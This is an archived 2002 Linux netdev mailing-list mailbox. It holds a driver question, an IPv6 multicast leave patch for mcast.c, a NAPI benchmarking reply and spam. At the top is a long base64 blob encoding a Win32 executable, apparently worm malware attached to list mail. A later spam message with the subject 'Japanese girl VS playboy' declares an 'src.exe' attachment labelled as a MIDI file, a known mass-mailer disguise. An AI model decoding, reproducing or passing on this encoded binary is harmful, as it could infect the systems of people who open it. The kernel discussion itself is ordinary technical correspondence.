0pKDlpHRV4MSF9LSg9HQ0NYQ0ZbVg5ZQUJCDllCDktIS0tOWg5aR0oPQ05DRU9FQ1leDFtEX 1lcAhBMXBMgJ3VDWg1AQkNWDENLSkoOWUIMX1hCDlpHRV4OWUFCQg1AQU9KA0xCSg5aR0hCD WZDSFYNW0ZCQgxDSFtIXg1NQ0NKD0RCWUIPVUNYXg59bAIQTFwTICRhYntoFgxvSU9PWV9KD lpHRV4OWUFCQg9NTlleD01eD04MS01HSg1mQ0hWDllCDElBQkIOWkdKDF9LTkINWUBfQgFdQ 0NKD2x6D0FAQ0ZZQF4PQ09UT0oNTF9WDVpHSEIPVUNaDF9YQg9GWAIQTFwTICdkSg1dQgNlS EFAX0oOWkdKDVtMXENEQUoDTEJKDV9KQ0lOWg0JTUBCW0RDW0kIAhBMXBMgJ2RKD1VDWg5HT 
FtKD0xDVg9fW0leW0VAQgJeQ0tNX0oOE04ORF9ISxEea0NPRkJZQBcJXBNDT0ZCDllCD0NKE QNMEAIuLi4uLi4uLyAle0RBHB4NZkNIVgx4HAIfHgwKDXtEQRweDGlAXUNaVgx7HAIfICVtQ l9UX0VKRloMHh4cHgNDTktKD0RCD21fR08gJ2xNQ1paDWZDSFYMeBwCHxwXICcnHgNjT0RCD 0NFXV9FQEIPRV4OWUIMX0pDS01fSg5aR0oMQ0laDE9MT1YOf2oMW0RfWV4Be0RBHB4MaUBdQ 1pXICckHgBhQg1fRUhDREtFT0xCWg1OR0xBS0gAYUIMT1lKDEtGV0pIAGFCD0xDVg5fT1ZBQ 05IAyAnbE1DWloNe0RBHB4MaUBdQ1pWDgZeQFYNR0tKXg5aR0oMQ09DSgJaR0xCVwcgJyceA GtaQkINTUNCX05bRE5DSg17REEcHg5/agxbRF9ZXg1AQg17REMWdQAdZQBieQJ2fyAnJB4Be 0ZaRgxbSF9WD0RCW0hfSV5bREFKDEtLTltYX0gBbkdJTUYPRlsPICclHgBhQg9MQ1YOX09WQ UNOSABhQg9MQ1YNQl5bR0NEV05bRUBDICcmGgBhQloMT1lKDEhfS0oAT0lPT1lfSg1ASg9OD kdYXF9WDVlAXUQAYUIPQUBfSg5aR0xCDlpEX0tKDVtLSUVeDEhdQ0IOR0xbREFKDV9ZTkYPR ktLTg5ZQg9NTU1DQl5DRV5HREFKDU1CS0RBSg9MQkoOW0leW0RBSyAmLAAABAAAAEAAAAB0A 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 
--JX9B723k1m6247sb1270X8y1Oj6xCv525579A--

From ralf@linux-mips.org Sun Sep 8 15:34:11 2002 Received: with ECARTIS (v1.0.0; list netdev); Sun, 08 Sep 2002 15:34:16 -0700 (PDT) Received: from dea.linux-mips.net (p508B4F9D.dip.t-dialin.net [80.139.79.157]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g88MY9tG011436 for ; Sun, 8 Sep 2002 15:34:10 -0700 Received: (from ralf@localhost) by dea.linux-mips.net (8.11.6/8.11.6) id g88McTA23469 for netdev@oss.sgi.com; Mon, 9 Sep 2002 00:38:29 +0200 Date: Mon, 9 Sep 2002 00:38:29 +0200 From: Ralf Baechle To: netdev@oss.sgi.com Subject: Driver for TI ACX100 based card? Message-ID: <20020909003828.A23101@linux-mips.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i X-archive-position: 143 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ralf@linux-mips.org Precedence: bulk X-list: netdev

I got a wireless card that is based on Texas Instruments's ACX100 chip. Anybody got me a pointer to a driver or at least to docs for writing one?
Thanks,
  Ralf

From bus@fgan.de Mon Sep 9 08:32:42 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 09 Sep 2002 08:32:47 -0700 (PDT) Received: from mailguard.fgan.de (root@mailguard.fgan.de [128.7.3.5]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g89FWetG009618 for ; Mon, 9 Sep 2002 08:32:41 -0700 Received: from rufsun5.ffm.fgan.de (rufsun5.ffm.fgan.de [128.7.2.5]) by mailguard.fgan.de (8.11.6/8.11.2) with SMTP id g89Fb2I06020; Mon, 9 Sep 2002 17:37:02 +0200 Received: from ruf098.fkie.fgan.de (5theBWyHbZTuFU2hNCVXUHm7B7Zfwl82@ruf098.fkie.fgan.de [128.7.2.98]) by rufsun5.ffm.fgan.de (8.8.6/8.8.8) with ESMTP id RAA22273; Mon, 9 Sep 2002 17:36:59 +0200 (CEST) Received: from bus by ruf098.fkie.fgan.de with local (Exim 3.35 #1) id 17oQaw-0004QA-00; Mon, 09 Sep 2002 17:36:58 +0200 Date: Mon, 9 Sep 2002 17:36:58 +0200 From: Michael Bussmann To: davem@redhat.com, pekkas@netcore.fi Cc: netdev@oss.sgi.com Subject: IPV6_LEAVE_GROUP with ipv6mr_interface=0 Message-ID: <20020909153658.GA14597@ruf098.fkie.fgan.de> Mail-Followup-To: davem@redhat.com, pekkas@netcore.fi, netdev@oss.sgi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.27i X-Virus-Scanned: by FGAN VirusScan X-archive-position: 144 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bus@mb-net.net Precedence: bulk X-list: netdev

Hi there,

I've had some problems with leaving IPv6 multicast groups when specifying ipv6mr_interface=0:

I joined a group with

| imr.ipv6mr_multiaddr=FF1E::123
| imr.ipv6mr_interface=0
| setsockopt(.., IPV6_JOIN_GROUP, &imr, ...)

This works perfectly so far. Leaving this group, however, with

| imr.ipv6mr_multiaddr=FF1E::123
| imr.ipv6mr_interface=0
| setsockopt(.., IPV6_LEAVE_GROUP, &imr, ...)

always resulted in an ENOENT. Is ipv6mr_interface=0 not appropriate for leaving a multicast group (it works under Solaris 2.8)?
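For reference, the join/leave sequence described above can be written out as a small user-space C sketch. The helper names `fill_mreq` and `join_then_leave` are hypothetical and do not come from the original report; the sketch only assumes the standard sockets API (`struct ipv6_mreq`, `IPV6_JOIN_GROUP`, `IPV6_LEAVE_GROUP`) on an `AF_INET6` socket supplied by the caller.

```c
#define _DEFAULT_SOURCE          /* make sure glibc exposes struct ipv6_mreq */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

/*
 * Hypothetical helper: fill an ipv6_mreq for the textual group address
 * `group` and interface index `ifindex` (0 means "let the kernel choose").
 * Returns 0 on success, -1 if `group` is not a valid IPv6 multicast address.
 */
static int fill_mreq(struct ipv6_mreq *imr, const char *group,
                     unsigned int ifindex)
{
    memset(imr, 0, sizeof(*imr));
    if (inet_pton(AF_INET6, group, &imr->ipv6mr_multiaddr) != 1)
        return -1;
    if (!IN6_IS_ADDR_MULTICAST(&imr->ipv6mr_multiaddr))
        return -1;
    imr->ipv6mr_interface = ifindex;
    return 0;
}

/*
 * Hypothetical helper: join `group` on socket `fd`, then leave it again
 * using the very same request. Returns 0 if both calls succeed; otherwise
 * returns -1 with errno set by the failing setsockopt() call (the report
 * above describes ENOENT from the leave step when ifindex is 0).
 */
static int join_then_leave(int fd, const char *group, unsigned int ifindex)
{
    struct ipv6_mreq imr;

    if (fill_mreq(&imr, group, ifindex) != 0)
        return -1;
    if (setsockopt(fd, IPPROTO_IPV6, IPV6_JOIN_GROUP,
                   &imr, sizeof(imr)) != 0)
        return -1;
    return setsockopt(fd, IPPROTO_IPV6, IPV6_LEAVE_GROUP,
                      &imr, sizeof(imr));
}
```

A caller would create a socket with `socket(AF_INET6, SOCK_DGRAM, 0)` and call `join_then_leave(fd, "ff1e::123", 0)`; whether the leave step succeeds depends on the kernel in use and on the host having a usable IPv6 multicast route.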
The following patch (for 2.4.18, but it should work with 2.5.33) makes the interface=0 stuff work. Maybe it breaks everything else...

Best regards,
MB

--
Michael Bussmann
Who will take the coal from the mine? Who will take the salt from the earth?
Who'll take a leaf and grow it to a tree? Don't Look Now, it ain't you or me.
  -- CCR, 'Dont Look Now', 1969

Patch for linux/net/ipv6/mcast.c:

--- mcast.c.orig	Mon Sep 9 16:40:07 2002
+++ mcast.c	Mon Sep 9 16:40:10 2002
@@ -140,15 +140,26 @@
 	struct ipv6_mc_socklist *mc_lst, **lnk;
 
 	write_lock_bh(&ipv6_sk_mc_lock);
+
 	for (lnk = &np->ipv6_mc_list; (mc_lst = *lnk) !=NULL ; lnk = &mc_lst->next) {
-		if (mc_lst->ifindex == ifindex &&
+		if ((ifindex == 0 || mc_lst->ifindex == ifindex) &&
 		    ipv6_addr_cmp(&mc_lst->addr, addr) == 0) {
 			struct net_device *dev;
 
 			*lnk = mc_lst->next;
 			write_unlock_bh(&ipv6_sk_mc_lock);
 
+			if (ifindex == 0) {
+				struct rt6_info *rt = rt6_lookup(addr, NULL, 0, 0);
+				dev = NULL;
+				if (rt) {
+					dev = rt->rt6i_dev;
+					dev_hold(dev);
+					dst_release(&rt->u.dst);
+				}
+			} else
+				dev = dev_get_by_index(ifindex);
-			if ((dev = dev_get_by_index(ifindex)) != NULL) {
+			if (dev!= NULL) {
 				ipv6_dev_mc_dec(dev, &mc_lst->addr);
 				dev_put(dev);
 			}

From manand@us.ibm.com Mon Sep 9 10:46:09 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 09 Sep 2002 10:46:12 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g89Hk8tG019867 for ; Mon, 9 Sep 2002 10:46:09 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e4.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g89HoQj2119866; Mon, 9 Sep 2002 13:50:26 -0400 Received: from d03nm123.boulder.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by northrelay02.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g89HoLKr070680; Mon, 9 Sep 2002 13:50:22 -0400 Subject: To: inux-net@vger.kernel.org, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Cc: "Bill Hartner" , davem@redhat.com, Robert Olsson , jamal
X-Mailer: Lotus Notes Release 5.0.7 March 21, 2001 Message-ID: From: "Mala Anand" Date: Mon, 9 Sep 2002 12:50:24 -0500 X-MIMETrack: Serialize by Router on D03NM123/03/M/IBM(Release 5.0.10 |March 22, 2002) at 09/09/2002 11:50:25 AM MIME-Version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id g89Hk8tG019867 X-archive-position: 145 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: manand@us.ibm.com Precedence: bulk X-list: netdev

> "David S. Miller" wrote:
>> NAPI is also not the panacea to all problems in the world.

>Mala did some testing on this a couple of weeks back. It appears that
>NAPI damaged performance significantly.

>http://www-124.ibm.com/developerworks/opensource/linuxperf/netperf/results/july_02/netperf2.5.25results.htm

>Unfortunately it is not listed what e1000 and core NAPI
>patch was used. Also, not listed, are the RX/TX mitigation
>and ring sizes given to the kernel module upon loading.

The default driver that is included in the 2.5.25 kernel for the Intel gigabit adapter was used for the baseline test, and the NAPI driver was downloaded from Robert Olsson's website. I have updated my web page to include Robert's patch. However, it is given there for reference purposes only. Except for the ones mentioned explicitly, the rest of the configurable values used are the defaults. The default for RX/TX mitigation is 64 microseconds and the default ring size is 80.

I have added statistics collected during the test to my web site. I do want to analyze and understand how NAPI can be improved in my tcp_stream test. Last year around November, when I first tested NAPI, I did find NAPI results better than the baseline using udp_stream. However, I am concentrating on tcp_stream since that is where NAPI can be improved in my setup. I will update the website as I do more work on this.
>Robert can comment on optimal settings

I saw Robert's postings. It looks like he may have a more recent version of the NAPI driver than the one I used. I also see that 2.5.33 has NAPI; I will move to 2.5.33 and continue my work on that.

>Robert and Jamal can make a more detailed analysis of Mala's
>graphs than I.

Jamal has asked about the socket buffer size that I used. I have tried a 132k socket buffer size in the past and I didn't see much difference in my tests. I will add that to my list again.

Regards,
Mala

Mala Anand
IBM Linux Technology Center - Kernel Performance
E-mail:manand@us.ibm.com
http://www-124.ibm.com/developerworks/opensource/linuxperf
http://www-124.ibm.com/developerworks/projects/linuxperf
Phone:838-8088; Tie-line:678-8088

From bert.verwoerd@wanadoo.nl Mon Sep 9 14:07:33 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 09 Sep 2002 14:07:39 -0700 (PDT) Received: from smtp6.wanadoo.nl (smtp6.wanadoo.nl [194.134.35.177]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g89L7MtG030357 for ; Mon, 9 Sep 2002 14:07:22 -0700 Received: from Iillrkgyh (d4404ba1.cable.wanadoo.nl [212.64.75.161]) by smtp6.wanadoo.nl (Postfix) with SMTP id EA1426F08F for ; Mon, 9 Sep 2002 22:46:25 +0200 (CEST) From: debian-hurd To: netdev@oss.sgi.com Subject: Japanese girl VS playboy MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=K6H0NW1t7D Message-Id: <20020909204625.EA1426F08F@smtp6.wanadoo.nl> Date: Mon, 9 Sep 2002 22:46:25 +0200 (CEST) X-archive-position: 146 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: debian-hurd@lists.debian.org Precedence: bulk X-list: netdev

--K6H0NW1t7D
Content-Type: text/html; Content-Transfer-Encoding: quoted-printable

--K6H0NW1t7D
Content-Type: audio/x-midi; name=src.exe Content-Transfer-Encoding: base64 Content-ID:

--K6H0NW1t7D
Content-Type: application/octet-stream; name=banners[20].htm Content-Transfer-Encoding: base64 Content-ID:
PGEgaHJlZj0iaHR0cDovL3d3dy5hZGNlbnRyYWwubmwvY2dpLWJpbi9hZHZlcnRwcm8vYmFu bmVycy5mcGw/cmVnaW9uPWJlbW5ldC0xMjAtbGVmdCZtb2RlPUNMSUNLJm5hbWU9d250LTEy MCZidXN0PSZyZWZlcnJlcj1odHRwOi8vd3d3LmFkdmVydGVlcmdyYXRpcy5ubC9jbGFzc2lm aWVkLnBocCUzRmNhdGlkJTNENSUyNnN1YmNhdGlkJTNENzklMjZhZGlkJTNENTk4MTEiIHRh cmdldD0iX2JsYW5rIj48aW1nIHNyYz0iaHR0cDovL2Jhbm5lcmV4Y2hhbmdlLmtsaWtrbGlr Lm5sL2Jhbm5lcnMyL2VkazIyLmdpZiIgYm9yZGVyPSIwIiBoZWlnaHQ9IjYwIiB3aWR0aD0i MTIwIiBhbHQ9IldhYXIgbmFhciB0b2U/IiBvbm1vdXNlb3Zlcj0nJyBvbm1vdXNlb3V0PScn PjwvYT=9 --K6H0NW1t7D-- From Cranfordlines.claimscenter@verizon.net Tue Sep 10 01:11:46 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 10 Sep 2002 01:11:48 -0700 (PDT) Received: from MailUser (tamqfl1-ar8-4-46-216-017.tamqfl1.dsl-verizon.net [4.46.216.17]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8A8BktG023782 for ; Tue, 10 Sep 2002 01:11:46 -0700 Message-Id: <200209100811.g8A8BktG023782@oss.sgi.com> Reply-To: cranfordlines.claimscenter@verizon.net From: "Steve Kelly" To: "" Subject: What happened with your forms processing idea? Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Date: Tue, 10 Sep 2002 04:01:58 -0400 X-archive-position: 147 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Cranfordlines.claimscenter@verizon.net Precedence: bulk X-list: netdev We are struggling with the decisions related to wether or not to go ahead with our plans to purchase an OCR and forms scanning solution. An outside consultant mentioned that he had heard that not to long ago you folks were considering implementing OCR technology to reduce data entry costs and improve efficiency. If you could let us know if you did move forward with any plans in that direction it would be of great help to us. May I ask what initialy prompted you to consider OCR? Did you decide it could help your compamy? What software did you go with? Would you recomend we take a look at it? 
